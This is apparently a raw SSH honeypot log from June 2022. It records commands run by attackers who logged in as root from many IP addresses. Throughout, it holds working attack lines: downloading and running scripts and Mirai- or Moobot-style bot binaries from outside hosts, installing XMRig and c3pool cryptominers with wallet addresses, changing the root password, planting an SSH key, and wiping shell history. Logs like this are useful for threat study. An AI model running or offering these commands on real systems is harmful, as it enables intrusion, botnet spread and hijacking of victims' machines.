Exec cd /tmp ; wget 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/cnrig ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
cd /tmp
wget 137.74.144.79/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 137.74.144.79/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 137.74.144.79/cnrig
chmod 777 cnrig
./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 179.43.142.180 5-Jun-2022 11:56:50 ssh2 root
Exec echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; wget http://2.56.57.167/x86_64; chmod 777 *; ./x86_64 x86hxed
echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
wget http://2.56.57.167/x86_64
chmod 777 *
./x86_64 x86hxed

From 81.17.18.60 6-Jun-2022 05:32:15 ssh2 root
Exec ping 8.8.8.8
ping 8.8.8.8

From 164.132.200.123 6-Jun-2022 21:25:56 ssh2 root
Exec wget 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; rm -rf cnrig ; pkill cnrig ; curl -O 137.74.144.79/cnrig ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
wget 137.74.144.79/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 137.74.144.79/ok.sh
sh ok.sh
rm -rf ok.sh
rm -rf cnrig
pkill cnrig
curl -O 137.74.144.79/cnrig
chmod 777 cnrig
./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 13.76.194.129 8-Jun-2022 02:55:56 ssh2 root
Exec nproc;uname -a
nproc
uname -a

From 150.95.137.118 8-Jun-2022 04:06:06 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred
perl /tmp/dred
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred
perl /tmp/dred
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://39.165.53.17:8088/iposzz/dred -o /tmp/dred
perl /tmp/dred

From 147.78.47.237 8-Jun-2022 09:03:42 ssh2 root
Exec uname -a & cat /proc/version
uname -a
cat /proc/version

From 46.19.137.50 8-Jun-2022 21:35:45 ssh2 root
Exec wget 31.7.58.162/sh; chmod 777 sh; ./sh wns.x86
wget 31.7.58.162/sh
chmod 777 sh
./sh wns.x86

From 66.70.180.54 10-Jun-2022 04:37:36 ssh2 root
Exec cd /tmp ; wget 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 137.74.144.79/cnrig ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
cd /tmp
wget 137.74.144.79/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 137.74.144.79/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 137.74.144.79/cnrig
chmod 777 cnrig
./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 179.43.142.180 10-Jun-2022 17:41:31 ssh2 root
Exec echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP
echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP

From 136.144.41.231 10-Jun-2022 20:15:03 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ

From 179.43.142.180 12-Jun-2022 08:49:16 ssh2 root
Exec echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP
echo root:3gti3j26jti5u5ji6rgg73554313gg33hg|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47qvXQ1xPY856WxKfhHTjwdaMz3duY6fpDMkL84aG2tGicwoKCMAKQe7SMhgu8wrDYAfzQi8MtMeXCYgjeVa5iTMQPkS6gP

From 136.144.41.231 12-Jun-2022 15:15:55 ssh2 root
Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ

From 205.185.124.113 15-Jun-2022 13:48:47 ssh2 root
Exec lscpu | grep cpu
lscpu | grep cpu

From 205.185.124.113 15-Jun-2022 13:57:05 ssh2 root
Exec curl api.ip.sb/ip
curl api.ip.sb/ip

From 31.44.185.235 15-Jun-2022 18:50:35 ssh2 root
Exec cat /bin/sh
cat /bin/sh

From 31.44.185.235 15-Jun-2022 23:05:40 ssh2 root
Exec cat /bin/sh || cat /bin/busybox || cat /bin/bash
cat /bin/sh || cat /bin/busybox || cat /bin/bash

From 104.244.74.191 15-Jun-2022 23:22:39 ssh2 root
Exec top -b -n 1 | grep top
top -b -n 1 | grep top

From 104.244.74.191 16-Jun-2022 00:58:26 ssh2 root
Exec whoami
whoami

From 104.244.74.191 16-Jun-2022 01:30:52 ssh2 root
Exec mkdir ~/.ssh&&echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxHCCWqIemQiJWdesLlmo/tBxGZhYvI5M9RG5+qVgWqalgeju0WLV8d4SyzQln2JCHlVACunSifby9XC7bAGSX4Gv0Tknew7Er8xWnLt44VMdHvXoUNsX64gVplpbNrfmNsoAyaFUF4NRhkuNjlIsUiq8g7loumanbBLV4Ov42FHqndB6bZKXbKWBquBWjViiAlgK1qvafG5WJ75jphBxGo7UbiiZzmcwjzw+Hc95VfPIR3jwQKrpsWUGG8LMK3u52YiHuNc4cFJ+S2KfJNTc0QLfdfrq63MHRkXM9Ltk0A1CnGEzEuDC+9ut7lhFMIQF+OAB3DlV1OhJVYgR6e9BdQ== rsa 2048-031322">>~/.ssh/authorized_key&&chmod 0644 ~/.ssh/authorized_key
mkdir ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxHCCWqIemQiJWdesLlmo/tBxGZhYvI5M9RG5+qVgWqalgeju0WLV8d4SyzQln2JCHlVACunSifby9XC7bAGSX4Gv0Tknew7Er8xWnLt44VMdHvXoUNsX64gVplpbNrfmNsoAyaFUF4NRhkuNjlIsUiq8g7loumanbBLV4Ov42FHqndB6bZKXbKWBquBWjViiAlgK1qvafG5WJ75jphBxGo7UbiiZzmcwjzw+Hc95VfPIR3jwQKrpsWUGG8LMK3u52YiHuNc4cFJ+S2KfJNTc0QLfdfrq63MHRkXM9Ltk0A1CnGEzEuDC+9ut7lhFMIQF+OAB3DlV1OhJVYgR6e9BdQ== rsa 2048-031322">>~/.ssh/authorized_key
chmod 0644 ~/.ssh/authorized_key

From 104.244.74.191 16-Jun-2022 01:40:29 ssh2 root
Exec mkdir /etc/xmrig&&cd /etc/xmrig&&wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz&&tar -zxvf xmrig-6.17.0-linux-x64.tar.gz&&cp ./xmrig-6.17.0/xmrig ./xmrig&&rm -rf xmrig-6*&&./xmrig -o 104.244.74.191 -B
mkdir /etc/xmrig
cd /etc/xmrig
wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz
tar -zxvf xmrig-6.17.0-linux-x64.tar.gz
cp ./xmrig-6.17.0/xmrig ./xmrig
rm -rf xmrig-6*
./xmrig -o 104.244.74.191 -B

From 104.244.74.191 16-Jun-2022 01:42:44 ssh2 root
Exec mkdir /etc/xmrig&&cd /etc/xmrig&&wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz&&tar -zxvf xmrig-6.17.0-linux-x64.tar.gz&&cp ./xmrig-6.17.0/xmrig ./xmrig&&rm -rf xmrig-6*&&chmod 777 xmrig&&./xmrig -o 104.244.74.191 -B
mkdir /etc/xmrig
cd /etc/xmrig
wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz
tar -zxvf xmrig-6.17.0-linux-x64.tar.gz
cp ./xmrig-6.17.0/xmrig ./xmrig
rm -rf xmrig-6*
chmod 777 xmrig
./xmrig -o 104.244.74.191 -B

From 104.244.74.191 16-Jun-2022 03:45:58 ssh2 root
Exec pkill xmrig -f && curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s &&mkdir /etc/xmrig&&cd /etc/xmrig&&wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz&&tar -zxvf xmrig-6.17.0-linux-x64.tar.gz&&cp ./xmrig-6.17.0/xmrig ./xmrig&&rm -rf xmrig-6*&&./xmrig -o 104.244.74.191 -B
pkill xmrig -f
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
mkdir /etc/xmrig
cd /etc/xmrig
wget https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-linux-x64.tar.gz
tar -zxvf xmrig-6.17.0-linux-x64.tar.gz
cp ./xmrig-6.17.0/xmrig ./xmrig
rm -rf xmrig-6*
./xmrig -o 104.244.74.191 -B

From 45.95.169.118 16-Jun-2022 06:50:04 ssh2 root
Exec wget http://45.95.169.118/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Apache.x86
wget http://45.95.169.118/mirai.x86
chmod 777 mirai.x86
./mirai.x86 Apache.x86

From 104.244.74.191 16-Jun-2022 16:49:16 ssh2 root
Exec uname -a&&wget
uname -a
wget

From 45.95.169.118 16-Jun-2022 22:29:33 ssh2 root
Exec wget http://45.95.169.118/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Apache.x86
wget http://45.95.169.118/mirai.x86
chmod 777 mirai.x86
./mirai.x86 Apache.x86

From 62.197.136.157 17-Jun-2022 01:45:44 ssh2 root
Exec wget http://62.197.136.157/x86_64; chmod 777 x86_64; ./x86_64 moobot.x86_64
wget http://62.197.136.157/x86_64
chmod 777 x86_64
./x86_64 moobot.x86_64

From 104.244.74.191 17-Jun-2022 14:50:30 ssh2 root
Exec uname -a&&cmake -h
uname -a
cmake -h

From 96.42.233.96 17-Jun-2022 15:00:26 ssh2 root
Exec uname -a || echo -
uname -a || echo -

From 104.244.74.191 18-Jun-2022 00:25:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O arm http://107.189.12.78/bin/arm; curl -o arm -O http://107.189.12.78/bin/arm; tftp 107.189.12.78 -c get arm; tftp -r arm -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm arm; chmod 777 arm;./arm; wget -O arm5 http://107.189.12.78/bin/arm5; curl -o arm5 -O http://107.189.12.78/bin/arm5; tftp 107.189.12.78 -c get arm5; tftp -r arm5 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm5 arm5; chmod 777 arm5;./arm5; wget -O arm6 http://107.189.12.78/bin/arm6; curl -o arm6 -O http://107.189.12.78/bin/arm6; tftp 107.189.12.78 -c get arm6; tftp -r arm6 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm6 arm6; chmod 777 arm6;./arm6; wget -O m68k http://107.189.12.78/bin/m68k; curl -o m68k -O http://107.189.12.78/bin/m68k; tftp 107.189.12.78 -c get m68k; tftp -r m68k -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 m68k m68k; chmod 777 m68k;./m68k; wget -O mips http://107.189.12.78/bin/mips; curl -o mips -O http://107.189.12.78/bin/mips; tftp 107.189.12.78 -c get mips; tftp -r mips -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mips mips; chmod 777 mips;./mips; wget -O mpsl http://107.189.12.78/bin/mpsl; curl -o mpsl -O http://107.189.12.78/bin/mpsl; tftp 107.189.12.78 -c get mpsl; tftp -r mpsl -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mpsl mpsl; chmod 777 mpsl;./mpsl; wget -O ppc http://107.189.12.78/bin/ppc; curl -o ppc -O http://107.189.12.78/bin/ppc; tftp 107.189.12.78 -c get ppc; tftp -r ppc -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 ppc ppc; chmod 777 ppc;./ppc; wget -O sh4 http://107.189.12.78/bin/sh4; curl -o sh4 -O http://107.189.12.78/bin/sh4; tftp 107.189.12.78 -c get sh4; tftp -r sh4 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 sh4 sh4; chmod 777 sh4;./sh4; wget -O x86 http://107.189.12.78/bin/x86; curl -o x86 -O http://107.189.12.78/bin/x86; tftp 107.189.12.78 -c get x86; tftp -r x86 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 x86 x86; chmod 777 x86;./x86; wget -O spc http://107.189.12.78/bin/spc; curl -o spc -O http://107.189.12.78/bin/spc; tftp 107.189.12.78 -c get spc; tftp -r spc -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 spc spc; chmod 777 spc;./spc;rm -rf arm arm5 arm6 m68k mips mpsl ppc sh4 spc x86;
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -O arm http://107.189.12.78/bin/arm
curl -o arm -O http://107.189.12.78/bin/arm
tftp 107.189.12.78 -c get arm
tftp -r arm -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm arm
chmod 777 arm
./arm
wget -O arm5 http://107.189.12.78/bin/arm5
curl -o arm5 -O http://107.189.12.78/bin/arm5
tftp 107.189.12.78 -c get arm5
tftp -r arm5 -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm5 arm5
chmod 777 arm5
./arm5
wget -O arm6 http://107.189.12.78/bin/arm6
curl -o arm6 -O http://107.189.12.78/bin/arm6
tftp 107.189.12.78 -c get arm6
tftp -r arm6 -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm6 arm6
chmod 777 arm6
./arm6
wget -O m68k http://107.189.12.78/bin/m68k
curl -o m68k -O http://107.189.12.78/bin/m68k
tftp 107.189.12.78 -c get m68k
tftp -r m68k -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 m68k m68k
chmod 777 m68k
./m68k
wget -O mips http://107.189.12.78/bin/mips
curl -o mips -O http://107.189.12.78/bin/mips
tftp 107.189.12.78 -c get mips
tftp -r mips -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mips mips
chmod 777 mips
./mips
wget -O mpsl http://107.189.12.78/bin/mpsl
curl -o mpsl -O http://107.189.12.78/bin/mpsl
tftp 107.189.12.78 -c get mpsl
tftp -r mpsl -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mpsl mpsl
chmod 777 mpsl
./mpsl
wget -O ppc http://107.189.12.78/bin/ppc
curl -o ppc -O http://107.189.12.78/bin/ppc
tftp 107.189.12.78 -c get ppc
tftp -r ppc -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 ppc ppc
chmod 777 ppc
./ppc

From 104.244.74.191 18-Jun-2022 00:56:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O arm http://107.189.12.78/bins/arm; curl -o arm -O http://107.189.12.78/bins/arm; tftp 107.189.12.78 -c get arm; tftp -r arm -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm arm; chmod 777 arm;./arm; wget -O arm5 http://107.189.12.78/bins/arm5; curl -o arm5 -O http://107.189.12.78/bins/arm5; tftp 107.189.12.78 -c get arm5; tftp -r arm5 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm5 arm5; chmod 777 arm5;./arm5; wget -O arm6 http://107.189.12.78/bins/arm6; curl -o arm6 -O http://107.189.12.78/bins/arm6; tftp 107.189.12.78 -c get arm6; tftp -r arm6 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm6 arm6; chmod 777 arm6;./arm6; wget -O m68k http://107.189.12.78/bins/m68k; curl -o m68k -O http://107.189.12.78/bins/m68k; tftp 107.189.12.78 -c get m68k; tftp -r m68k -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 m68k m68k; chmod 777 m68k;./m68k; wget -O mips http://107.189.12.78/bins/mips; curl -o mips -O http://107.189.12.78/bins/mips; tftp 107.189.12.78 -c get mips; tftp -r mips -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mips mips; chmod 777 mips;./mips; wget -O mpsl http://107.189.12.78/bins/mpsl; curl -o mpsl -O http://107.189.12.78/bins/mpsl; tftp 107.189.12.78 -c get mpsl; tftp -r mpsl -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mpsl mpsl; chmod 777 mpsl;./mpsl; wget -O ppc http://107.189.12.78/bins/ppc; curl -o ppc -O http://107.189.12.78/bins/ppc; tftp 107.189.12.78 -c get ppc; tftp -r ppc -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 ppc ppc; chmod 777 ppc;./ppc; wget -O sh4 http://107.189.12.78/bins/sh4; curl -o sh4 -O http://107.189.12.78/bins/sh4; tftp 107.189.12.78 -c get sh4; tftp -r sh4 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 sh4 sh4; chmod 777 sh4;./sh4; wget -O x86 http://107.189.12.78/bins/x86; curl -o x86 -O http://107.189.12.78/bins/x86; tftp 107.189.12.78 -c get x86; tftp -r x86 -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 x86 x86; chmod 777 x86;./x86; wget -O spc http://107.189.12.78/bins/spc; curl -o spc -O http://107.189.12.78/bins/spc; tftp 107.189.12.78 -c get spc; tftp -r spc -g 107.189.12.78;ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 spc spc; chmod 777 spc;./spc;rm -rf arm arm5 arm6 m68k mips mpsl ppc sh4 spc x86;
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -O arm http://107.189.12.78/bins/arm
curl -o arm -O http://107.189.12.78/bins/arm
tftp 107.189.12.78 -c get arm
tftp -r arm -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm arm
chmod 777 arm
./arm
wget -O arm5 http://107.189.12.78/bins/arm5
curl -o arm5 -O http://107.189.12.78/bins/arm5
tftp 107.189.12.78 -c get arm5
tftp -r arm5 -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm5 arm5
chmod 777 arm5
./arm5
wget -O arm6 http://107.189.12.78/bins/arm6
curl -o arm6 -O http://107.189.12.78/bins/arm6
tftp 107.189.12.78 -c get arm6
tftp -r arm6 -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 arm6 arm6
chmod 777 arm6
./arm6
wget -O m68k http://107.189.12.78/bins/m68k
curl -o m68k -O http://107.189.12.78/bins/m68k
tftp 107.189.12.78 -c get m68k
tftp -r m68k -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 m68k m68k
chmod 777 m68k
./m68k
wget -O mips http://107.189.12.78/bins/mips
curl -o mips -O http://107.189.12.78/bins/mips
tftp 107.189.12.78 -c get mips
tftp -r mips -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mips mips
chmod 777 mips
./mips
wget -O mpsl http://107.189.12.78/bins/mpsl
curl -o mpsl -O http://107.189.12.78/bins/mpsl
tftp 107.189.12.78 -c get mpsl
tftp -r mpsl -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 mpsl mpsl
chmod 777 mpsl
./mpsl
wget -O ppc http://107.189.12.78/bins/ppc
curl -o ppc -O http://107.189.12.78/bins/ppc
tftp 107.189.12.78 -c get ppc
tftp -r ppc -g 107.189.12.78
ftpget -v -u anonymous -p anonymous -P 21 107.189.12.78 ppc ppc
chmod 777 ppc
./ppc

From 37.44.244.23 18-Jun-2022 13:50:13 ssh2 root
Exec echo -n dpmmawwj|md5sum;uname -a
echo -n dpmmawwj|md5sum
uname -a

From 113.229.114.221 20-Jun-2022 04:45:56 ssh2 root
Exec echo "Uname: "`uname -a`;echo "ID: "`id`
echo "Uname: "`uname -a`
echo "ID: "`id`

From 104.244.74.191 20-Jun-2022 07:17:49 ssh2 root
Exec curl -L http://104.244.74.191/sep.sh -o sep.sh && chmod +x sep.sh && bash ./sep.sh
curl -L http://104.244.74.191/sep.sh -o sep.sh
chmod +x sep.sh
bash ./sep.sh

From 62.197.136.10 21-Jun-2022 20:33:23 ssh2 root
Exec wget 62.197.136.157/x-8.6-.Sakura; chmod 777 x-8.6-.Sakura; ./x-8.6-.Sakura x86_64
wget 62.197.136.157/x-8.6-.Sakura
chmod 777 x-8.6-.Sakura
./x-8.6-.Sakura x86_64

From 2.58.149.116 22-Jun-2022 12:02:22 ssh2 root
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'

From 2.58.149.116 22-Jun-2022 12:34:51 ssh2 root
Exec echo -e '\x79\x65\x73\x68\x65\x6c\x6f'
echo -e '\x79\x65\x73\x68\x65\x6c\x6f'

From 45.133.1.114 22-Jun-2022 14:04:25 ssh2 root
Exec nproc;uname -s -n -r -i
nproc
uname -s -n -r -i

From 212.192.241.132 23-Jun-2022 12:32:59 ssh2 root
Exec sudo hive-passwd set dgj3235ij23jirg; sudo hive-passwd 2ji4ghji34hji3jh4i5i5j4h; pkill Xorg; sudo pkill x11vnc; uname -a
sudo hive-passwd set dgj3235ij23jirg
sudo hive-passwd 2ji4ghji34hji3jh4i5i5j4h
pkill Xorg
sudo pkill x11vnc
uname -a

From 200.125.29.162 25-Jun-2022 10:05:35 ssh2 root
Exec echo -n 39thxk61|md5sum;uname -a
echo -n 39thxk61|md5sum
uname -a

From 83.166.209.225 25-Jun-2022 18:08:17 ssh2 root
Exec echo -n g4hi4idg|md5sum;uname -a
echo -n g4hi4idg|md5sum
uname -a

From 36.110.228.254 26-Jun-2022 23:13:33 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec /ip cloud print
/ip cloud print

From 194.60.201.85 30-Jun-2022 19:11:36 ssh2 root
Exec cd /tmp ; wget http://95.111.214.132/ok.sh &> /dev/null ; sh ok.sh ; rm -rf ok.sh ; curl -O http://95.111.214.132/ok.sh &> /dev/null ; sh ok.sh ; rm -rf ok.sh ; history -c ; curl -O http://95.111.214.132/cnrig &> /dev/null ; chmod 777 cnrig ; ./cnrig -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema -k --tls -B &> /dev/null ; history -c
cd /tmp
wget http://95.111.214.132/ok.sh
> /dev/null
sh ok.sh
rm -rf ok.sh
curl -O http://95.111.214.132/ok.sh
> /dev/null
sh ok.sh
rm -rf ok.sh
history -c
curl -O http://95.111.214.132/cnrig
> /dev/null
chmod 777 cnrig
